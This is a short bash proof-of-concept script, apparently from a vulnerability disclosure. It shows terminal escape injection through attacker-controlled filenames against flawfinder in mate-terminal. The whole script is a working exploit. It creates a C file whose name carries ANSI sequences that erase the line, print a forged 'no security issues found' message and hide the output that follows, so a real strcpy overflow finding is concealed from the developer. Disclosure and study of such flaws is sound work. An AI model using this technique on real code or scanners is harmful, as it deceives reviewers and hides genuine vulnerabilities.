#!/usr/bin/env bash
# POC: Terminal-escape sequence injection via attacker-controlled filenames
# Target: flawfinder 2.0.19, mate-terminal (libvte) on Parrot OS.
#
# A developer who clones a hostile source tree and
# runs `flawfinder .` sees forged / hidden hits. Luckily, there is NO code execution
# on mate-terminal as VTE filters dangerous sequences. The most likely
# impact is visual deception of a developer reviewing scan output.
#
# Run from any writable directory:
#     bash poc.sh
# Then cd into the printed directory and run:
#     flawfinder .
# Cleanup:  rm -rf /tmp/ff-poc

set -eu

POC_DIR="/tmp/ff-poc"
rm -rf "$POC_DIR"
mkdir -p "$POC_DIR"
cd "$POC_DIR"

# Bytes we'll embed in the filename
ESC=$'\x1b'
CR=$'\r'
BEL=$'\x07'

# ---------------------------------------------------------------------------
# Payload A:
# Contains the necessary ANSI bytes to control terminal output.
# Obviously, changing the text "[OK] flawfinder: no security issues found"
# will alter what the terminal outputs.
# ---------------------------------------------------------------------------

PAYLOAD_A="${ESC}[0m${CR}${ESC}[2K${ESC}[32m[OK] flawfinder: no security issues found${ESC}[0m${ESC}[8m"

# Filename must end in a recognized C extension so flawfinder will scan it.
FNAME_A="${PAYLOAD_A}genuine.c"

# Store some code that flawfinder would generally find problems with.
cat > "$FNAME_A" <<'EOF'
#include <string.h>
void f(char *s) {
    char buf[8];
    strcpy(buf, s);   /* genuine flawfinder level-4 hit */
}
EOF


echo
echo "POC tree built at: ${POC_DIR}"
echo "Files (showing literal control bytes with cat -v):"
ls -1 | cat -v
echo
echo "Now run:    cd ${POC_DIR} && flawfinder ."
echo